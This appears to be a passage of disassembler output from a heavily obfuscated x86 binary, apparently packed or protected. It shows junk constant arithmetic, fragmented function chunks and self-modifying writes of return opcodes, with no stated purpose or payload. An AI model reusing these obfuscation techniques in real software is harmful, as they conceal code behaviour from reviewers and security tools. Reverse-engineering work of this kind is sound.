loc_4489BF: ; CODE XREF: sub_43F0B0+1AA3Ej
jmp loc_458DF6
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
add ebx, edx
loc_4489C6: ; CODE XREF: ut7h7i2x:loc_452CC4j
jnb loc_44FA45
shr ebp, 1
jmp loc_43D94E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_4489D3: ; CODE XREF: sub_44E5DC-DB80j
jnz loc_43EAB7
jmp loc_44474D
; END OF FUNCTION CHUNK FOR sub_44E5DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4489DF proc near ; CODE XREF: sub_44486Aj
; DATA XREF: sub_43A5C0:loc_444860o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439A91 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043A7F1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043B181 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043B902 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043D276 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F59E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441159 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044173A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044330D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004457BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044702B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C12F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E9AD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EBC6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F12B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004520FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045268B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453781 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456A4C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045878E SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00459102 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A8E2 SIZE 00000005 BYTES
push 18D3EEE9h
pop eax
or eax, 749DF38Dh
add eax, 12159A96h
and eax, 0F3BFA6D6h
add eax, 7D8F48F2h
jmp loc_4457BB
sub_4489DF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_448A02: ; CODE XREF: ut7h7i2x:0043E841j
xchg eax, [esp]
pop eax
pop edx
jnb loc_43BD8C
push offset loc_457342
jmp locret_443DF1
; ---------------------------------------------------------------------------
popf
xor eax, 36AD33ABh
jmp sub_43A513
; ---------------------------------------------------------------------------
loc_448A23: ; CODE XREF: ut7h7i2x:0045A390j
xor edi, 0B1B13C15h
rol edi, 1
sub edi, 18E1B88Ah
call sub_457BC2
; START OF FUNCTION CHUNK FOR sub_43A556
loc_448A36: ; CODE XREF: sub_43A556+133A6j
jmp nullsub_16
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_448A3B: ; CODE XREF: sub_44F300-2EFAj
jmp loc_45683F
; END OF FUNCTION CHUNK FOR sub_44F300
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_448A40: ; CODE XREF: sub_45742F-5B64j
add edx, 4DC7F694h
sub edx, 504CDE25h
rol edx, 1
xor edx, 60EF15F3h
popf
add eax, edx
jmp loc_454D2E
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_448A5C: ; CODE XREF: sub_4463D6:loc_44183Aj
; ut7h7i2x:loc_449770j
pop ebp
mov eax, [esp+0]
push edx
call sub_441EC6
jmp loc_449720
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
loc_448A6B: ; CODE XREF: ut7h7i2x:00446DF3j
rol ebx, 4
xor ebx, 7BEE7BC2h
rol ebx, 18h
add ebx, 0F3A99F2Eh
jmp loc_43CD6C
; ---------------------------------------------------------------------------
locret_448A82: ; CODE XREF: ut7h7i2x:loc_43E7BCj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454277
loc_448A83: ; CODE XREF: sub_454277+Aj
jmp loc_45465A
; END OF FUNCTION CHUNK FOR sub_454277
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_448A88: ; CODE XREF: sub_446CA0+1179j
jmp loc_453B45
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_448A8D: ; CODE XREF: sub_43AED9+4260j
jmp loc_44A730
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44022F
loc_448A92: ; CODE XREF: sub_44022F:loc_459D3Cj
push offset sub_454700
jmp sub_450E81
; END OF FUNCTION CHUNK FOR sub_44022F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_448A9C: ; CODE XREF: sub_440493:loc_43EDF1j
mov eax, ds:dword_44A898
or eax, eax
jnz loc_447FFB
jmp loc_452680
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_448AAF: ; CODE XREF: sub_453E14:loc_458F4Bj
jb loc_455F28
jmp loc_4538C9
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
locret_448ABA: ; CODE XREF: ut7h7i2x:loc_44400Fj
retn
; ---------------------------------------------------------------------------
loc_448ABB: ; CODE XREF: ut7h7i2x:0044CBE0j
jnp loc_44AA28
jg loc_444EB5
; START OF FUNCTION CHUNK FOR sub_448321
loc_448AC7: ; CODE XREF: sub_448321:loc_439D2Dj
or ebx, 0BF9DE84Eh
cmp ebx, 554F1682h
jmp loc_44874D
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
mov eax, 19CFC62Bh
call sub_43AA94
push esi
; START OF FUNCTION CHUNK FOR sub_43A556
loc_448AE3: ; CODE XREF: sub_43A556:loc_445B89j
push 6466D8D2h
jmp loc_458C25
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_448AED: ; CODE XREF: ut7h7i2x:loc_440C30j
add edx, ebp
add edx, 0BD07A6A3h
mov edx, [edx]
shr edx, 3
push 624F9EA6h
pop ecx
jmp loc_43A8B7
; ---------------------------------------------------------------------------
loc_448B05: ; CODE XREF: ut7h7i2x:0044D96Dj
sub ecx, esi
shr eax, 17h
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_448B0A: ; CODE XREF: ut7h7i2x:loc_43C3D1j
; sub_45601B-16D36j ...
push offset loc_43AB98
jmp loc_453FEC
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_448B14: ; CODE XREF: ut7h7i2x:00440188j
; sub_45A79F:loc_44BD05j ...
jmp loc_44F4AC
; ---------------------------------------------------------------------------
loc_448B19: ; CODE XREF: sub_44917B-A815j
; sub_45A79F-EA4Cj
pop ecx
xchg eax, [esp-4+arg_0]
mov ebp, eax
; END OF FUNCTION CHUNK FOR sub_44917B
; START OF FUNCTION CHUNK FOR sub_453E26
loc_448B1F: ; CODE XREF: sub_453E26:loc_4515D1j
pop eax
jmp nullsub_180
; END OF FUNCTION CHUNK FOR sub_453E26
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_226. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F000
loc_448B26: ; CODE XREF: sub_44F000+42CEj
jmp nullsub_489
; END OF FUNCTION CHUNK FOR sub_44F000
; ---------------------------------------------------------------------------
loc_448B2B: ; CODE XREF: ut7h7i2x:00457CA4j
ja loc_449747
and edx, esi
jmp loc_442F29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_448B38: ; CODE XREF: sub_446CA0+7B53j
jl loc_440BAC
loc_448B3E: ; CODE XREF: sub_446CA0:loc_453B45j
mov eax, [ebp-18h]
add eax, 3D1D5295h
add eax, 0C2E2AD8Fh
mov eax, [eax]
add eax, [ebp-4]
call sub_4522DD
loc_448B57: ; DATA XREF: sub_43C08A+Ao
push eax
push ecx
push 8860DA9h
pop ecx
and ecx, ds:4000F3h
add ecx, 0F77BFF78h
xchg ecx, [esp-4+arg_0]
jmp loc_43BA54
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
loc_448B73: ; CODE XREF: ut7h7i2x:0044154Aj
jg loc_4401EA
cmp esi, 5DEE2DEFh
jmp loc_452CC4
; ---------------------------------------------------------------------------
loc_448B84: ; CODE XREF: ut7h7i2x:0044D48Bj
jnb loc_43AB34
loc_448B8A: ; CODE XREF: ut7h7i2x:0044D479j
or edx, 0FB0BCFD6h
; START OF FUNCTION CHUNK FOR sub_45A070
loc_448B90: ; CODE XREF: sub_45A070:loc_4472CEj
add edx, 138C590h
xchg edx, [esp+0]
jmp loc_45291E
; END OF FUNCTION CHUNK FOR sub_45A070
; ---------------------------------------------------------------------------
loc_448B9E: ; CODE XREF: ut7h7i2x:004492CDj
jnz loc_4560C2
jmp loc_453F29
; ---------------------------------------------------------------------------
loc_448BA9: ; CODE XREF: ut7h7i2x:loc_441B08j
push offset sub_43B727
jmp locret_44D59F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_448BB3: ; CODE XREF: sub_439BD1+19233j
jge loc_4522AB
add eax, 0FD49BBA4h
jmp loc_4522A9
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_448BC4: ; CODE XREF: sub_459B58:loc_459F9Dj
or esi, ebp
jmp loc_444529
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
loc_448BCB: ; CODE XREF: ut7h7i2x:00454E98j
xchg edx, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_448BD3: ; CODE XREF: sub_43ADDB:loc_452C17j
popf
push eax
call sub_43F3D1
push 0C0AE1A3h
loc_448BDF: ; CODE XREF: ut7h7i2x:00449163j
pop eax
rol eax, 1Fh
add eax, 92AA543Fh
call sub_43F3AE
; END OF FUNCTION CHUNK FOR sub_43ADDB
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_448BEE: ; CODE XREF: ut7h7i2x:loc_45204Cj
; sub_439AE7+1873Fj
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B1E7
loc_448BF3: ; CODE XREF: sub_44B1E7+Bj
jz loc_443A4A
jmp loc_4479D6
; END OF FUNCTION CHUNK FOR sub_44B1E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_448BFE: ; CODE XREF: sub_4519D2:loc_4468D5j
mov ecx, [ebx+ecx+0Ch]
push offset byte_43AC0D
jmp nullsub_214
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B7D3
loc_448C0C: ; CODE XREF: sub_44B7D3+10j
sub ecx, 4E09EA04h
; END OF FUNCTION CHUNK FOR sub_44B7D3
; START OF FUNCTION CHUNK FOR sub_439701
loc_448C12: ; CODE XREF: sub_439701:loc_439400j
or ecx, 0BA717723h
add ecx, 4D73BCh
xchg ecx, [esp-8+arg_4]
jmp loc_4503BE
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
mov eax, 0D372DA5Dh
call sub_44E70F
; START OF FUNCTION CHUNK FOR sub_459812
loc_448C30: ; CODE XREF: sub_459812+8j
jmp nullsub_545
; END OF FUNCTION CHUNK FOR sub_459812
; ---------------------------------------------------------------------------
loc_448C35: ; CODE XREF: ut7h7i2x:004437B3j
jmp loc_43929D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_448C3A: ; CODE XREF: sub_44865D-CE6Bj
xchg ebp, esi
jmp loc_44D624
; END OF FUNCTION CHUNK FOR sub_44865D
; =============== S U B R O U T I N E =======================================
sub_448C41 proc near ; DATA XREF: ut7h7i2x:004429D9o
mov eax, [esp+0]
push edx
call sub_43F7A5
sub_448C41 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_448C4A: ; CODE XREF: sub_43F7A5:loc_451FD0j
mov eax, 469EF90Dh
jmp loc_452C3D
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45114D
loc_448C54: ; CODE XREF: sub_45114D:loc_446012j
rol eax, 1Eh
jmp loc_43BAE7
; END OF FUNCTION CHUNK FOR sub_45114D
; ---------------------------------------------------------------------------
test ebx, 0EAD269DFh
jmp loc_455B3E
; ---------------------------------------------------------------------------
jl locret_45ACEA
pop ebp
jmp sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457AEF
loc_448C73: ; CODE XREF: sub_457AEF+13j
ror eax, 16h
sub eax, 11FE6D4Dh
push edi
push 721286Fh
pop edi
add edi, 1BDD496Ch
xor edi, 327DB624h
jmp loc_43F9A5
; END OF FUNCTION CHUNK FOR sub_457AEF
; ---------------------------------------------------------------------------
loc_448C94: ; CODE XREF: ut7h7i2x:0045808Ej
jnz loc_4527D4
jmp loc_44B92C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_448C9F: ; CODE XREF: sub_439B67:loc_449924j
jnz loc_44D4B2
jmp loc_4501F9
; END OF FUNCTION CHUNK FOR sub_439B67
; =============== S U B R O U T I N E =======================================
sub_448CAA proc near ; CODE XREF: ut7h7i2x:0044B2A9j
; sub_4469B9+EA51p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg ecx, [esp-4+arg_0]
retn
sub_448CAA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4570FD
loc_448CB2: ; CODE XREF: sub_4570FD-DE3Dj
jmp loc_441A9A
; END OF FUNCTION CHUNK FOR sub_4570FD
; ---------------------------------------------------------------------------
loc_448CB7: ; CODE XREF: ut7h7i2x:004434E3j
jmp loc_44422C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_448CBC proc near ; CODE XREF: sub_454596+494Fp
; FUNCTION CHUNK AT 0043B630 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043BE24 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043C9A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E9F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004446E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446CB6 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044DF99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004518D0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004531B7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004559B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F91 SIZE 0000000D BYTES
push ebp
mov ebp, esp
jmp loc_456F91
sub_448CBC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_448CC4: ; CODE XREF: sub_452B14+4404j
mov ecx, 0EC2BC3Fh
adc edx, 1F573623h
jz loc_450949
jmp loc_43BB5B
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_448CDA: ; CODE XREF: ut7h7i2x:0043CD1Aj
add edi, eax
; =============== S U B R O U T I N E =======================================
sub_448CDC proc near ; CODE XREF: ut7h7i2x:00440248p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BA37 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043DF0E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FEAB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00446017 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449E4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454356 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459431 SIZE 0000001D BYTES
xchg edx, [esp+0]
pop edx
or eax, eax
jnz loc_449E4F
jmp loc_454356
sub_448CDC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_448CED proc near ; CODE XREF: ut7h7i2x:loc_442D77j
; ut7h7i2x:004549B0p
; FUNCTION CHUNK AT 0043B38D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044084A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044415A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004457B5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452849 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457D3C SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
push ecx
push 0E24CA213h
pop ecx
xor ecx, ds:4000F7h
jmp loc_44084A
sub_448CED endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_448D03: ; DATA XREF: sub_447F8A-D39Bo
inc dword ptr [ebp-8]
; START OF FUNCTION CHUNK FOR sub_447F8A
loc_448D06: ; CODE XREF: sub_447F8A:loc_4515EDj
; sub_447F8A+986Aj
push offset sub_44D9B0
jmp nullsub_157
; END OF FUNCTION CHUNK FOR sub_447F8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4428C8
loc_448D10: ; CODE XREF: sub_4428C8+7j
push 0DAAF2199h
pop esi
and esi, 0AF73769Ch
sub esi, offset word_423182
or esi, 8B20C125h
add esi, 1A997C2Dh
add ecx, esi
jmp loc_4429C8
; END OF FUNCTION CHUNK FOR sub_4428C8
; ---------------------------------------------------------------------------
loc_448D35: ; CODE XREF: ut7h7i2x:loc_455058j
; ut7h7i2x:004598A1j
xchg esi, [edx]
; =============== S U B R O U T I N E =======================================
sub_448D37 proc near ; CODE XREF: ut7h7i2x:0044ED44p
xchg esi, [esp+0]
pop esi
add ebx, 20A11F4Eh
mov [ebx], eax
pop ebx
jmp loc_44D8C6
sub_448D37 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448630
loc_448D49: ; CODE XREF: sub_448630-2D8Bj
xor edi, 72EC4D8Eh
; END OF FUNCTION CHUNK FOR sub_448630
; START OF FUNCTION CHUNK FOR sub_457A66
loc_448D4F: ; CODE XREF: sub_457A66-134BBj
add edi, ebp
add edi, 38C85E7Fh
mov [edi], eax
jmp loc_45744E
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_448D5E: ; CODE XREF: ut7h7i2x:0044556Bj
jnz loc_44AB1D
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_448D64: ; CODE XREF: sub_444EAA+C3FEj
jmp loc_43C018
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523CA
loc_448D69: ; CODE XREF: sub_4523CA-16474j
jmp loc_45AA80
; END OF FUNCTION CHUNK FOR sub_4523CA
; ---------------------------------------------------------------------------
push eax
pushf
jmp loc_44AB1B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_448D75: ; CODE XREF: sub_4423C1:loc_44D47Fj
mov eax, [ebp-8]
; END OF FUNCTION CHUNK FOR sub_4423C1
; START OF FUNCTION CHUNK FOR sub_45633E
loc_448D78: ; CODE XREF: sub_45633E:loc_450DE1j
call sub_456A74
; END OF FUNCTION CHUNK FOR sub_45633E
; START OF FUNCTION CHUNK FOR sub_45215F
loc_448D7D: ; CODE XREF: sub_45215F+18j
jmp loc_43B1D5
; END OF FUNCTION CHUNK FOR sub_45215F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_448D82: ; CODE XREF: sub_447CBE-7449j
jmp loc_43D84C
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_448D87: ; CODE XREF: ut7h7i2x:0045688Bj
jle loc_4392F1
mov edx, [ebx]
; START OF FUNCTION CHUNK FOR sub_43B847
loc_448D8F: ; CODE XREF: sub_43B847:loc_45687Ej
xor edi, 503D7969h
or edi, 542FC1E4h
jmp loc_4554A9
; END OF FUNCTION CHUNK FOR sub_43B847
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_465. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_448DA1: ; CODE XREF: sub_4503C3-6297j
xchg esi, [ebx]
loc_448DA3: ; CODE XREF: sub_45983B:loc_44DE0Cj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_451AAF
jmp loc_43B89A
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4474B1
loc_448DB4: ; CODE XREF: sub_4474B1+17j
cmp eax, [ebp-8]
jnz loc_4408B0
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
jmp loc_455E7A
; END OF FUNCTION CHUNK FOR sub_4474B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443FC3
loc_448DCD: ; CODE XREF: sub_443FC3:loc_446F0Fj
jz loc_4484C7
jmp loc_445259
; END OF FUNCTION CHUNK FOR sub_443FC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_448DD9 proc near ; DATA XREF: ut7h7i2x:00439FCBo
; FUNCTION CHUNK AT 0043CDB5 SIZE 00000005 BYTES
mov ds:dword_41D0FC, eax
lea eax, nullsub_11
mov byte ptr [eax], 0C3h
jmp loc_43CDB5
sub_448DD9 endp
; ---------------------------------------------------------------------------
loc_448DED: ; CODE XREF: ut7h7i2x:004475BEj
mov eax, [esp]
push offset loc_45ABDD
jmp loc_4470DB
; ---------------------------------------------------------------------------
loc_448DFA: ; CODE XREF: ut7h7i2x:loc_4428C3j
mov [ebp+0], ecx
loc_448DFD: ; CODE XREF: ut7h7i2x:loc_43F043j
mov eax, [ebp-0Ch]
loc_448E00: ; CODE XREF: ut7h7i2x:loc_4438AAj
push eax
push eax
jmp loc_457D96
; ---------------------------------------------------------------------------
ror esi, 1Dh
jmp loc_459922
; ---------------------------------------------------------------------------
loc_448E0F: ; DATA XREF: ut7h7i2x:0044B096o
add eax, 7690CC5h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_43D872
jmp loc_44365C
; ---------------------------------------------------------------------------
loc_448E25: ; DATA XREF: sub_45439C+546Co
shr eax, 0Bh
jmp loc_44D2E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_448E2D: ; CODE XREF: sub_43F7A5:loc_43A630j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
loc_448E33: ; CODE XREF: sub_43F7A5+F6CFj
jnz loc_44FE95
mov eax, [ebp-8]
jmp loc_454848
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
mov edi, 13AE96EDh
not edi
jmp sub_458389
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_406. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_448E4E: ; CODE XREF: sub_43CA2D+13929j
jmp loc_450243
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
loc_448E53: ; CODE XREF: ut7h7i2x:0044F656j
xor eax, eax
push offset sub_4505C0
jmp loc_44B978
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456397
loc_448E5F: ; CODE XREF: sub_456397:loc_4568BDj
pop ecx
rol ecx, 6
add ecx, 14A2C74Fh
xchg ecx, [esp-4+arg_0]
jmp loc_44D993
; END OF FUNCTION CHUNK FOR sub_456397
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_448E71: ; CODE XREF: sub_443816:loc_43B415j
call sub_43AA94
mov ds:off_41D0B0, eax
lea eax, loc_43BD0E
mov byte ptr [eax], 0C3h
jmp loc_43BD0E
; ---------------------------------------------------------------------------
loc_448E8A: ; CODE XREF: sub_443816:loc_43BD0Ej
pop edx
mov eax, [esp-4+arg_0]
push edx
jmp loc_448F89
; END OF FUNCTION CHUNK FOR sub_443816
; ---------------------------------------------------------------------------
push 6229FB7Fh
pop eax
xor eax, 0A0875D95h
sub eax, 3FB19F2Eh
cmp eax, 8641CB67h
jmp loc_448405
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_448EB1: ; CODE XREF: sub_4459EE:loc_443223j
xor eax, 858E6E86h
call sub_43AA94
push ebx
; END OF FUNCTION CHUNK FOR sub_4459EE
; START OF FUNCTION CHUNK FOR sub_449700
loc_448EBD: ; CODE XREF: sub_449700:loc_441566j
push 0D29A7BEFh
pop ebx
sub ebx, 0F9D9CFE9h
jmp loc_43F8CD
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
shl ebp, 19h
jl loc_4562AD
jmp sub_4576C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_448EDC: ; CODE XREF: sub_452B14-14264j
push offset loc_446A8C
jmp loc_43C28B
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_448EE6: ; CODE XREF: ut7h7i2x:loc_4438CAj
; ut7h7i2x:004438DFj
rol edx, 1Dh
jb loc_448736
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_448EEF: ; CODE XREF: sub_4524FE-B770j
jmp nullsub_506
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_448EF4: ; CODE XREF: sub_44EC11-15571j
jmp loc_43ADC0
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_448EF9: ; CODE XREF: sub_444273+DDBDj
push edi
jmp loc_459468
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
loc_448EFF: ; DATA XREF: sub_44602A+B5FCo
push esi
pop ebp
pop esi
push ecx
push 38FFC01Ah
pop ecx
and ecx, 1448BA6Eh
sub ecx, 35E402F8h
jmp loc_444014
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_448F1B: ; CODE XREF: sub_4463D6:loc_449720j
push 13F2B905h
pop eax
or eax, 546CE80Eh
rol eax, 0Ch
jmp loc_451F07
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
loc_448F2F: ; CODE XREF: ut7h7i2x:00441E67j
sbb ebp, ebx
; =============== S U B R O U T I N E =======================================
sub_448F31 proc near ; CODE XREF: ut7h7i2x:loc_44E0C6p
xchg esi, [esp+0]
pop esi
push eax
lea eax, dword_4502C4
push offset loc_44E738
jmp nullsub_522
sub_448F31 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D17F
loc_448F46: ; CODE XREF: sub_43D17F:loc_443228j
and esi, ds:4000F6h
rol esi, 1Bh
xor esi, 8684EF67h
sub esi, 0DE6497h
js loc_453A4C
or edi, eax
jmp loc_453A3C
; END OF FUNCTION CHUNK FOR sub_43D17F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_448F68: ; CODE XREF: sub_4503C3-F24Aj
or esi, ecx
jmp loc_4405A7
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_448F6F: ; CODE XREF: sub_4576C6:loc_453412j
jb loc_455F28
jmp loc_44E58B
; END OF FUNCTION CHUNK FOR sub_4576C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_448F7A: ; CODE XREF: sub_450FDE:loc_454D8Dj
push offset loc_445E7D
jmp nullsub_321
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_448F84: ; CODE XREF: sub_443816:loc_43C433j
call sub_43CD2F
loc_448F89: ; CODE XREF: sub_443816+5679j
call sub_45341C
mov eax, 0DA4431C0h
call sub_43AA94
mov ds:off_41D0B0, eax
lea eax, loc_43BD0E
mov byte ptr [eax], 0C3h
jmp loc_43BD0E
; END OF FUNCTION CHUNK FOR sub_443816
; =============== S U B R O U T I N E =======================================
sub_448FAC proc near ; CODE XREF: sub_40F3FF+8Cp
; ut7h7i2x:0043B478j
; DATA XREF: ...
; FUNCTION CHUNK AT 0043A084 SIZE 00000005 BYTES
push offset sub_446BFE
jmp loc_43A084
sub_448FAC endp
